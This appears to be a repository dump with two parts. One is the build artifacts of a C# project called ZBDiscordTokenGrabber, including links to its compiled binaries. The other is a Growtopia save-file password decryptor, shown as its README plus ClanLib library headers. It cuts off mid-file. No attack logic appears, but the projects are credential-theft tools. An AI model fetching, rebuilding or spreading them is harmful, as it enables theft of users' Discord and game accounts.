/ZBDiscordTokenGrabber/ZBDiscordTokenGrabber/Properties/Settings.settings: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /ZBDiscordTokenGrabber/ZBDiscordTokenGrabber/bin/Debug/ZBDiscordTokenGrabber.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/ZBDiscordTokenGrabber/ZBDiscordTokenGrabber/bin/Debug/ZBDiscordTokenGrabber.exe -------------------------------------------------------------------------------- /ZBDiscordTokenGrabber/ZBDiscordTokenGrabber/bin/Debug/ZBDiscordTokenGrabber.exe.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /ZBDiscordTokenGrabber/ZBDiscordTokenGrabber/bin/Debug/ZBDiscordTokenGrabber.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/ZBDiscordTokenGrabber/ZBDiscordTokenGrabber/bin/Debug/ZBDiscordTokenGrabber.pdb -------------------------------------------------------------------------------- /ZBDiscordTokenGrabber/ZBDiscordTokenGrabber/bin/Release/ZBDiscordTokenGrabber.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/ZBDiscordTokenGrabber/ZBDiscordTokenGrabber/bin/Release/ZBDiscordTokenGrabber.exe -------------------------------------------------------------------------------- /ZBDiscordTokenGrabber/ZBDiscordTokenGrabber/bin/Release/ZBDiscordTokenGrabber.exe.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /ZBDiscordTokenGrabber/ZBDiscordTokenGrabber/bin/Release/ZBDiscordTokenGrabber.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/ZBDiscordTokenGrabber/ZBDiscordTokenGrabber/bin/Release/ZBDiscordTokenGrabber.pdb -------------------------------------------------------------------------------- /ZBDiscordTokenGrabber/ZBDiscordTokenGrabber/obj/Debug/.NETFramework,Version=v4.7.2.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.7.2", FrameworkDisplayName = ".NET Framework 4.7.2")] 5 | -------------------------------------------------------------------------------- /ZBDiscordTokenGrabber/ZBDiscordTokenGrabber/obj/Debug/DesignTimeResolveAssemblyReferences.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/ZBDiscordTokenGrabber/ZBDiscordTokenGrabber/obj/Debug/DesignTimeResolveAssemblyReferences.cache -------------------------------------------------------------------------------- /ZBDiscordTokenGrabber/ZBDiscordTokenGrabber/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/ZBDiscordTokenGrabber/ZBDiscordTokenGrabber/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /ZBDiscordTokenGrabber/ZBDiscordTokenGrabber/obj/Debug/ZBDiscordTokenGrabber.Properties.Resources.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/ZBDiscordTokenGrabber/ZBDiscordTokenGrabber/obj/Debug/ZBDiscordTokenGrabber.Properties.Resources.resources -------------------------------------------------------------------------------- /ZBDiscordTokenGrabber/ZBDiscordTokenGrabber/obj/Debug/ZBDiscordTokenGrabber.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | ad8f05752220fb5b4e59c1e716152bbc39f1a42c 2 | -------------------------------------------------------------------------------- /ZBDiscordTokenGrabber/ZBDiscordTokenGrabber/obj/Debug/ZBDiscordTokenGrabber.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\zephy\source\repos\ZBDiscordTokenGrabber\ZBDiscordTokenGrabber\bin\Debug\ZBDiscordTokenGrabber.exe.config 2 | C:\Users\zephy\source\repos\ZBDiscordTokenGrabber\ZBDiscordTokenGrabber\bin\Debug\ZBDiscordTokenGrabber.exe 3 | C:\Users\zephy\source\repos\ZBDiscordTokenGrabber\ZBDiscordTokenGrabber\bin\Debug\ZBDiscordTokenGrabber.pdb 4 | C:\Users\zephy\source\repos\ZBDiscordTokenGrabber\ZBDiscordTokenGrabber\obj\Debug\ZBDiscordTokenGrabber.csprojAssemblyReference.cache 5 | C:\Users\zephy\source\repos\ZBDiscordTokenGrabber\ZBDiscordTokenGrabber\obj\Debug\ZBDiscordTokenGrabber.Properties.Resources.resources 6 | C:\Users\zephy\source\repos\ZBDiscordTokenGrabber\ZBDiscordTokenGrabber\obj\Debug\ZBDiscordTokenGrabber.csproj.GenerateResource.cache 7 | C:\Users\zephy\source\repos\ZBDiscordTokenGrabber\ZBDiscordTokenGrabber\obj\Debug\ZBDiscordTokenGrabber.csproj.CoreCompileInputs.cache 8 | C:\Users\zephy\source\repos\ZBDiscordTokenGrabber\ZBDiscordTokenGrabber\obj\Debug\ZBDiscordTokenGrabber.exe 9 | C:\Users\zephy\source\repos\ZBDiscordTokenGrabber\ZBDiscordTokenGrabber\obj\Debug\ZBDiscordTokenGrabber.pdb 10 | -------------------------------------------------------------------------------- /ZBDiscordTokenGrabber/ZBDiscordTokenGrabber/obj/Debug/ZBDiscordTokenGrabber.csproj.GenerateResource.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/ZBDiscordTokenGrabber/ZBDiscordTokenGrabber/obj/Debug/ZBDiscordTokenGrabber.csproj.GenerateResource.cache -------------------------------------------------------------------------------- /ZBDiscordTokenGrabber/ZBDiscordTokenGrabber/obj/Debug/ZBDiscordTokenGrabber.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/ZBDiscordTokenGrabber/ZBDiscordTokenGrabber/obj/Debug/ZBDiscordTokenGrabber.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /ZBDiscordTokenGrabber/ZBDiscordTokenGrabber/obj/Debug/ZBDiscordTokenGrabber.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/ZBDiscordTokenGrabber/ZBDiscordTokenGrabber/obj/Debug/ZBDiscordTokenGrabber.exe -------------------------------------------------------------------------------- /ZBDiscordTokenGrabber/ZBDiscordTokenGrabber/obj/Debug/ZBDiscordTokenGrabber.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/ZBDiscordTokenGrabber/ZBDiscordTokenGrabber/obj/Debug/ZBDiscordTokenGrabber.pdb -------------------------------------------------------------------------------- /ZBDiscordTokenGrabber/ZBDiscordTokenGrabber/obj/Release/.NETFramework,Version=v4.7.2.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.7.2", FrameworkDisplayName = ".NET Framework 4.7.2")] 5 | -------------------------------------------------------------------------------- /ZBDiscordTokenGrabber/ZBDiscordTokenGrabber/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/ZBDiscordTokenGrabber/ZBDiscordTokenGrabber/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /ZBDiscordTokenGrabber/ZBDiscordTokenGrabber/obj/Release/ZBDiscordTokenGrabber.Properties.Resources.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/ZBDiscordTokenGrabber/ZBDiscordTokenGrabber/obj/Release/ZBDiscordTokenGrabber.Properties.Resources.resources -------------------------------------------------------------------------------- /ZBDiscordTokenGrabber/ZBDiscordTokenGrabber/obj/Release/ZBDiscordTokenGrabber.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | a64cd4073087456bba3bf8e06d6c6d586f6347b9 2 | -------------------------------------------------------------------------------- /ZBDiscordTokenGrabber/ZBDiscordTokenGrabber/obj/Release/ZBDiscordTokenGrabber.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\zephy\source\repos\ZBDiscordTokenGrabber\ZBDiscordTokenGrabber\bin\Release\ZBDiscordTokenGrabber.exe.config 2 | C:\Users\zephy\source\repos\ZBDiscordTokenGrabber\ZBDiscordTokenGrabber\bin\Release\ZBDiscordTokenGrabber.exe 3 | C:\Users\zephy\source\repos\ZBDiscordTokenGrabber\ZBDiscordTokenGrabber\bin\Release\ZBDiscordTokenGrabber.pdb 4 | C:\Users\zephy\source\repos\ZBDiscordTokenGrabber\ZBDiscordTokenGrabber\obj\Release\ZBDiscordTokenGrabber.csprojAssemblyReference.cache 5 | C:\Users\zephy\source\repos\ZBDiscordTokenGrabber\ZBDiscordTokenGrabber\obj\Release\ZBDiscordTokenGrabber.Properties.Resources.resources 6 | C:\Users\zephy\source\repos\ZBDiscordTokenGrabber\ZBDiscordTokenGrabber\obj\Release\ZBDiscordTokenGrabber.csproj.GenerateResource.cache 7 | C:\Users\zephy\source\repos\ZBDiscordTokenGrabber\ZBDiscordTokenGrabber\obj\Release\ZBDiscordTokenGrabber.csproj.CoreCompileInputs.cache 8 | C:\Users\zephy\source\repos\ZBDiscordTokenGrabber\ZBDiscordTokenGrabber\obj\Release\ZBDiscordTokenGrabber.exe 9 | C:\Users\zephy\source\repos\ZBDiscordTokenGrabber\ZBDiscordTokenGrabber\obj\Release\ZBDiscordTokenGrabber.pdb 10 | -------------------------------------------------------------------------------- /ZBDiscordTokenGrabber/ZBDiscordTokenGrabber/obj/Release/ZBDiscordTokenGrabber.csproj.GenerateResource.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/ZBDiscordTokenGrabber/ZBDiscordTokenGrabber/obj/Release/ZBDiscordTokenGrabber.csproj.GenerateResource.cache -------------------------------------------------------------------------------- /ZBDiscordTokenGrabber/ZBDiscordTokenGrabber/obj/Release/ZBDiscordTokenGrabber.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/ZBDiscordTokenGrabber/ZBDiscordTokenGrabber/obj/Release/ZBDiscordTokenGrabber.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /ZBDiscordTokenGrabber/ZBDiscordTokenGrabber/obj/Release/ZBDiscordTokenGrabber.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/ZBDiscordTokenGrabber/ZBDiscordTokenGrabber/obj/Release/ZBDiscordTokenGrabber.exe -------------------------------------------------------------------------------- /ZBDiscordTokenGrabber/ZBDiscordTokenGrabber/obj/Release/ZBDiscordTokenGrabber.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/ZBDiscordTokenGrabber/ZBDiscordTokenGrabber/obj/Release/ZBDiscordTokenGrabber.pdb -------------------------------------------------------------------------------- /savedecrypter-master/README.md: -------------------------------------------------------------------------------- 1 | Modded Growtopia save.dat decryptor that always gets correct save.dat password from ama6nen. 2 | 3 | -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.29201.188 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "savedecrypter", "savedecrypter\savedecrypter.vcxproj", "{0162BC55-B36F-43CB-BDF1-871C29B480C5}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {0162BC55-B36F-43CB-BDF1-871C29B480C5}.Debug|x64.ActiveCfg = Debug|x64 17 | {0162BC55-B36F-43CB-BDF1-871C29B480C5}.Debug|x64.Build.0 = Debug|x64 18 | {0162BC55-B36F-43CB-BDF1-871C29B480C5}.Debug|x86.ActiveCfg = Debug|Win32 19 | {0162BC55-B36F-43CB-BDF1-871C29B480C5}.Debug|x86.Build.0 = Debug|Win32 20 | {0162BC55-B36F-43CB-BDF1-871C29B480C5}.Release|x64.ActiveCfg = Release|x64 21 | {0162BC55-B36F-43CB-BDF1-871C29B480C5}.Release|x64.Build.0 = Release|x64 22 | {0162BC55-B36F-43CB-BDF1-871C29B480C5}.Release|x86.ActiveCfg = Release|Win32 23 | {0162BC55-B36F-43CB-BDF1-871C29B480C5}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {EF57A2C9-FA9F-457B-B021-D4EC53373790} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter/ClanLib-2.0/Sources/API/Core/IOData/datatypes.h: -------------------------------------------------------------------------------- 1 | /* 2 | ** ClanLib SDK 3 | ** Copyright (c) 1997-2010 The ClanLib Team 4 | ** 5 | ** This software is provided 'as-is', without any express or implied 6 | ** warranty. In no event will the authors be held liable for any damages 7 | ** arising from the use of this software. 8 | ** 9 | ** Permission is granted to anyone to use this software for any purpose, 10 | ** including commercial applications, and to alter it and redistribute it 11 | ** freely, subject to the following restrictions: 12 | ** 13 | ** 1. The origin of this software must not be misrepresented; you must not 14 | ** claim that you wrote the original software. If you use this software 15 | ** in a product, an acknowledgment in the product documentation would be 16 | ** appreciated but is not required. 17 | ** 2. Altered source versions must be plainly marked as such, and must not be 18 | ** misrepresented as being the original software. 19 | ** 3. This notice may not be removed or altered from any source distribution. 20 | ** 21 | ** Note: Some of the libraries ClanLib may link to may have additional 22 | ** requirements or restrictions. 23 | ** 24 | ** File Author(s): 25 | ** 26 | ** Magnus Norddahl 27 | ** (if your name is missing here, please add it) 28 | */ 29 | 30 | /// \addtogroup clanCore_I_O_Data clanCore I/O Data 31 | /// \{ 32 | 33 | #pragma once 34 | 35 | #if defined(WIN32) && (defined(__MINGW32__) == 0) 36 | typedef __int8 cl_int8; 37 | typedef unsigned __int8 cl_uint8; 38 | typedef __int16 cl_int16; 39 | typedef unsigned __int16 cl_uint16; 40 | typedef __int32 cl_int32; 41 | typedef unsigned __int32 cl_uint32; 42 | typedef __int64 cl_int64; 43 | typedef unsigned __int64 cl_uint64; 44 | #else 45 | typedef char cl_int8; 46 | typedef unsigned char cl_uint8; 47 | typedef short cl_int16; 48 | typedef unsigned short cl_uint16; 49 | typedef int cl_int32; 50 | typedef unsigned int cl_uint32; 51 | typedef long long cl_int64; 52 | typedef unsigned long long cl_uint64; 53 | #endif 54 | 55 | /// \} 56 | -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter/ClanLib-2.0/Sources/API/Core/IOData/file_help.h: -------------------------------------------------------------------------------- 1 | /* 2 | ** ClanLib SDK 3 | ** Copyright (c) 1997-2010 The ClanLib Team 4 | ** 5 | ** This software is provided 'as-is', without any express or implied 6 | ** warranty. In no event will the authors be held liable for any damages 7 | ** arising from the use of this software. 8 | ** 9 | ** Permission is granted to anyone to use this software for any purpose, 10 | ** including commercial applications, and to alter it and redistribute it 11 | ** freely, subject to the following restrictions: 12 | ** 13 | ** 1. The origin of this software must not be misrepresented; you must not 14 | ** claim that you wrote the original software. If you use this software 15 | ** in a product, an acknowledgment in the product documentation would be 16 | ** appreciated but is not required. 17 | ** 2. Altered source versions must be plainly marked as such, and must not be 18 | ** misrepresented as being the original software. 19 | ** 3. This notice may not be removed or altered from any source distribution. 20 | ** 21 | ** Note: Some of the libraries ClanLib may link to may have additional 22 | ** requirements or restrictions. 23 | ** 24 | ** File Author(s): 25 | ** 26 | ** Magnus Norddahl 27 | ** Kenneth Gangstoe 28 | */ 29 | 30 | /// \addtogroup clanCore_I_O_Data clanCore I/O Data 31 | /// \{ 32 | 33 | #pragma once 34 | 35 | #include "../api_core.h" 36 | 37 | /// \brief File operation helpers. 38 | /// 39 | /// \xmlonly !group=Core/IO Data! !header=core.h! \endxmlonly 40 | class CL_API_CORE CL_FileHelp 41 | { 42 | /// \name Operations 43 | /// \{ 44 | public: 45 | /// \brief Copy a file. 46 | /// 47 | /// \param from Where to copy from 48 | /// \param to Where to copy to 49 | /// \param copy_always true = Copy, even if destination already exists. false = Do not copy if destination exists (throw a CL_Exception) 50 | static void copy_file(const CL_String &from, const CL_String &to, bool copy_always); 51 | 52 | /// \brief Delete a file. 53 | /// 54 | /// \param filename File to delete 55 | static void delete_file(const CL_String &filename); 56 | 57 | /// \brief Check if a file exists. 58 | /// 59 | /// \param filename File to check for existance 60 | static bool file_exists(const CL_String &filename); 61 | /// \} 62 | }; 63 | 64 | /// \} 65 | -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter/ClanLib-2.0/Sources/API/Core/IOData/iodevice_memory.h: -------------------------------------------------------------------------------- 1 | /* 2 | ** ClanLib SDK 3 | ** Copyright (c) 1997-2010 The ClanLib Team 4 | ** 5 | ** This software is provided 'as-is', without any express or implied 6 | ** warranty. In no event will the authors be held liable for any damages 7 | ** arising from the use of this software. 8 | ** 9 | ** Permission is granted to anyone to use this software for any purpose, 10 | ** including commercial applications, and to alter it and redistribute it 11 | ** freely, subject to the following restrictions: 12 | ** 13 | ** 1. The origin of this software must not be misrepresented; you must not 14 | ** claim that you wrote the original software. If you use this software 15 | ** in a product, an acknowledgment in the product documentation would be 16 | ** appreciated but is not required. 17 | ** 2. Altered source versions must be plainly marked as such, and must not be 18 | ** misrepresented as being the original software. 19 | ** 3. This notice may not be removed or altered from any source distribution. 20 | ** 21 | ** Note: Some of the libraries ClanLib may link to may have additional 22 | ** requirements or restrictions. 23 | ** 24 | ** File Author(s): 25 | ** 26 | ** Magnus Norddahl 27 | */ 28 | 29 | /// \addtogroup clanCore_I_O_Data clanCore I/O Data 30 | /// \{ 31 | 32 | #pragma once 33 | 34 | #include "../api_core.h" 35 | #include "iodevice.h" 36 | 37 | class CL_DataBuffer; 38 | 39 | /// \brief Memory I/O device. 40 | /// 41 | /// \xmlonly !group=Core/IO Data! !header=core.h! \endxmlonly 42 | class CL_API_CORE CL_IODevice_Memory : public CL_IODevice 43 | { 44 | /// \name Construction 45 | /// \{ 46 | 47 | public: 48 | /// \brief Constructs a memory I/O device. 49 | CL_IODevice_Memory(); 50 | 51 | /// \brief Constructs a IODevice Memory 52 | /// 53 | /// \param data = Data Buffer 54 | CL_IODevice_Memory(CL_DataBuffer &data); 55 | 56 | /// \} 57 | /// \name Attributes 58 | /// \{ 59 | 60 | public: 61 | /// \brief Retrieves the data buffer for the memory device. 62 | const CL_DataBuffer &get_data() const; 63 | 64 | /// \brief Get Data 65 | /// 66 | /// \return data 67 | CL_DataBuffer &get_data(); 68 | 69 | /// \} 70 | /// \name Operations 71 | /// \{ 72 | 73 | public: 74 | 75 | /// \} 76 | /// \name Implementation 77 | /// \{ 78 | 79 | private: 80 | /// \} 81 | }; 82 | 83 | /// \} 84 | -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter/ClanLib-2.0/Sources/API/Core/Math/cl_math.h: -------------------------------------------------------------------------------- 1 | /* 2 | ** ClanLib SDK 3 | ** Copyright (c) 1997-2010 The ClanLib Team 4 | ** 5 | ** This software is provided 'as-is', without any express or implied 6 | ** warranty. In no event will the authors be held liable for any damages 7 | ** arising from the use of this software. 8 | ** 9 | ** Permission is granted to anyone to use this software for any purpose, 10 | ** including commercial applications, and to alter it and redistribute it 11 | ** freely, subject to the following restrictions: 12 | ** 13 | ** 1. The origin of this software must not be misrepresented; you must not 14 | ** claim that you wrote the original software. If you use this software 15 | ** in a product, an acknowledgment in the product documentation would be 16 | ** appreciated but is not required. 17 | ** 2. Altered source versions must be plainly marked as such, and must not be 18 | ** misrepresented as being the original software. 19 | ** 3. This notice may not be removed or altered from any source distribution. 20 | ** 21 | ** Note: Some of the libraries ClanLib may link to may have additional 22 | ** requirements or restrictions. 23 | ** 24 | ** File Author(s): 25 | ** 26 | ** Magnus Norddahl 27 | */ 28 | 29 | /// \addtogroup clanCore_Math clanCore Math 30 | /// \{ 31 | 32 | #pragma once 33 | 34 | #include "../api_core.h" 35 | //#include 36 | #include 37 | 38 | #ifndef CL_PI 39 | #define CL_PI 3.141592653589793238462643383279f 40 | #endif 41 | 42 | template inline T cl_pow2(T value) { return value*value; } 43 | template inline A cl_min(A a, B b) { return a < b ? a : b; } 44 | template inline A cl_max(A a, B b) { return a > b ? a : b; } 45 | 46 | /// \} 47 | 48 | -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter/ClanLib-2.0/Sources/API/Core/Math/math.h: -------------------------------------------------------------------------------- 1 | /* 2 | ** ClanLib SDK 3 | ** Copyright (c) 1997-2009 The ClanLib Team 4 | ** 5 | ** This software is provided 'as-is', without any express or implied 6 | ** warranty. In no event will the authors be held liable for any damages 7 | ** arising from the use of this software. 8 | ** 9 | ** Permission is granted to anyone to use this software for any purpose, 10 | ** including commercial applications, and to alter it and redistribute it 11 | ** freely, subject to the following restrictions: 12 | ** 13 | ** 1. The origin of this software must not be misrepresented; you must not 14 | ** claim that you wrote the original software. If you use this software 15 | ** in a product, an acknowledgment in the product documentation would be 16 | ** appreciated but is not required. 17 | ** 2. Altered source versions must be plainly marked as such, and must not be 18 | ** misrepresented as being the original software. 19 | ** 3. This notice may not be removed or altered from any source distribution. 20 | ** 21 | ** Note: Some of the libraries ClanLib may link to may have additional 22 | ** requirements or restrictions. 23 | ** 24 | ** File Author(s): 25 | ** 26 | ** Magnus Norddahl 27 | */ 28 | 29 | /// \addtogroup clanCore_Math clanCore Math 30 | /// \{ 31 | 32 | 33 | #pragma once 34 | 35 | 36 | #if _MSC_VER > 1000 37 | #pragma once 38 | #endif 39 | 40 | #include "../api_core.h" 41 | #include 42 | #include "../IOData/datatypes.h" 43 | 44 | #ifndef CL_PI 45 | #define CL_PI 3.141592653589793238462643383279f 46 | #endif 47 | 48 | template inline T cl_pow2(T value) { return value*value; } 49 | template T cl_min(T a, T b) { if(a < b) return a; return b; } 50 | template T cl_max(T a, T b) { if(a > b) return a; return b; } 51 | 52 | 53 | /// \} 54 | -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter/ClanLib-2.0/Sources/API/Core/Math/origin.h: -------------------------------------------------------------------------------- 1 | /* 2 | ** ClanLib SDK 3 | ** Copyright (c) 1997-2010 The ClanLib Team 4 | ** 5 | ** This software is provided 'as-is', without any express or implied 6 | ** warranty. In no event will the authors be held liable for any damages 7 | ** arising from the use of this software. 8 | ** 9 | ** Permission is granted to anyone to use this software for any purpose, 10 | ** including commercial applications, and to alter it and redistribute it 11 | ** freely, subject to the following restrictions: 12 | ** 13 | ** 1. The origin of this software must not be misrepresented; you must not 14 | ** claim that you wrote the original software. If you use this software 15 | ** in a product, an acknowledgment in the product documentation would be 16 | ** appreciated but is not required. 17 | ** 2. Altered source versions must be plainly marked as such, and must not be 18 | ** misrepresented as being the original software. 19 | ** 3. This notice may not be removed or altered from any source distribution. 20 | ** 21 | ** Note: Some of the libraries ClanLib may link to may have additional 22 | ** requirements or restrictions. 23 | ** 24 | ** File Author(s): 25 | ** 26 | ** Magnus Norddahl 27 | ** Kenneth Gangstoe 28 | */ 29 | 30 | /// \addtogroup clanCore_Math clanCore Math 31 | /// \{ 32 | 33 | #pragma once 34 | 35 | #include "../api_core.h" 36 | 37 | /// \brief Alignment origins. 38 | /// 39 | /// \xmlonly !group=Core/Math! !header=core.h! \endxmlonly 40 | enum CL_Origin 41 | { 42 | origin_top_left, 43 | origin_top_center, 44 | origin_top_right, 45 | origin_center_left, 46 | origin_center, 47 | origin_center_right, 48 | origin_bottom_left, 49 | origin_bottom_center, 50 | origin_bottom_right 51 | }; 52 | 53 | /// \} 54 | -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter/ClanLib-2.0/Sources/API/Core/System/comptr.h: -------------------------------------------------------------------------------- 1 | /* 2 | ** ClanLib SDK 3 | ** Copyright (c) 1997-2010 The ClanLib Team 4 | ** 5 | ** This software is provided 'as-is', without any express or implied 6 | ** warranty. In no event will the authors be held liable for any damages 7 | ** arising from the use of this software. 8 | ** 9 | ** Permission is granted to anyone to use this software for any purpose, 10 | ** including commercial applications, and to alter it and redistribute it 11 | ** freely, subject to the following restrictions: 12 | ** 13 | ** 1. The origin of this software must not be misrepresented; you must not 14 | ** claim that you wrote the original software. If you use this software 15 | ** in a product, an acknowledgment in the product documentation would be 16 | ** appreciated but is not required. 17 | ** 2. Altered source versions must be plainly marked as such, and must not be 18 | ** misrepresented as being the original software. 19 | ** 3. This notice may not be removed or altered from any source distribution. 20 | ** 21 | ** Note: Some of the libraries ClanLib may link to may have additional 22 | ** requirements or restrictions. 23 | ** 24 | ** File Author(s): 25 | ** 26 | ** Magnus Norddahl 27 | */ 28 | 29 | #pragma once 30 | 31 | 32 | #include "../api_core.h" 33 | 34 | template 35 | /// \brief CL_ComPtr 36 | /// 37 | /// \xmlonly !group=Core/System! !header=core.h! \endxmlonly 38 | class CL_API_CORE CL_ComPtr 39 | { 40 | public: 41 | CL_ComPtr() : ptr(0) { } 42 | CL_ComPtr(Type *ptr) : ptr(ptr) { } 43 | CL_ComPtr(const CL_ComPtr ©) : ptr(copy.ptr) { if (ptr) ptr->AddRef(); } 44 | ~CL_ComPtr() { clear(); } 45 | CL_ComPtr &operator =(const CL_ComPtr ©) 46 | { 47 | if (this == ©) 48 | return *this; 49 | copy.ptr->AddRef(); 50 | if (ptr) 51 | ptr->Release(); 52 | ptr = copy.ptr; 53 | return *this; 54 | } 55 | const Type * const operator ->() const { return ptr; } 56 | Type *operator ->() { return ptr; } 57 | operator Type *() { return ptr; } 58 | 59 | bool is_null() const { return ptr == 0; } 60 | void clear() { if (ptr) ptr->Release(); ptr = 0; } 61 | Type **output_variable() { clear(); return &ptr; } 62 | 63 | Type *ptr; 64 | }; 65 | 66 | 67 | -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter/ClanLib-2.0/Sources/API/Core/System/disposable_object.h: -------------------------------------------------------------------------------- 1 | /* 2 | ** ClanLib SDK 3 | ** Copyright (c) 1997-2010 The ClanLib Team 4 | ** 5 | ** This software is provided 'as-is', without any express or implied 6 | ** warranty. In no event will the authors be held liable for any damages 7 | ** arising from the use of this software. 8 | ** 9 | ** Permission is granted to anyone to use this software for any purpose, 10 | ** including commercial applications, and to alter it and redistribute it 11 | ** freely, subject to the following restrictions: 12 | ** 13 | ** 1. The origin of this software must not be misrepresented; you must not 14 | ** claim that you wrote the original software. If you use this software 15 | ** in a product, an acknowledgment in the product documentation would be 16 | ** appreciated but is not required. 17 | ** 2. Altered source versions must be plainly marked as such, and must not be 18 | ** misrepresented as being the original software. 19 | ** 3. This notice may not be removed or altered from any source distribution. 20 | ** 21 | ** Note: Some of the libraries ClanLib may link to may have additional 22 | ** requirements or restrictions. 23 | ** 24 | ** File Author(s): 25 | ** 26 | ** Magnus Norddahl 27 | */ 28 | 29 | #pragma once 30 | 31 | #include "../api_core.h" 32 | 33 | /// \brief CL_DisposableObject 34 | /// 35 | /// \xmlonly !group=Core/System! !header=core.h! \endxmlonly 36 | class CL_DisposableObject 37 | { 38 | public: 39 | CL_DisposableObject(); 40 | 41 | void dispose(); 42 | void throw_if_disposed() const; 43 | bool is_disposed() const; 44 | 45 | protected: 46 | virtual void on_dispose() = 0; 47 | 48 | private: 49 | bool disposed; 50 | }; 51 | -------------------------------------------------------------------------------- /savedecrypter-master/savedecrypter/ClanLib-2.0/Sources/API/Core/System/fixed_memory_pool.h: -------------------------------------------------------------------------------- 1 | /* 2 | ** ClanLib SDK 3 | ** Copyright (c) 1997-2010 The ClanLib Team 4 | ** 5 | ** This software is provided 'as-is', without any express or implied 6 | ** warranty. In no event will the authors be held liable for any damages 7 | ** arising from the use of this software. 8 | ** 9 | ** Permission is granted to anyone to use this software for any purpose, 10 | ** including commercial applications, and to alter it and redistribute it 11 | ** freely, subject to the following restrictions: 12 | ** 13 | ** 1. The origin of this 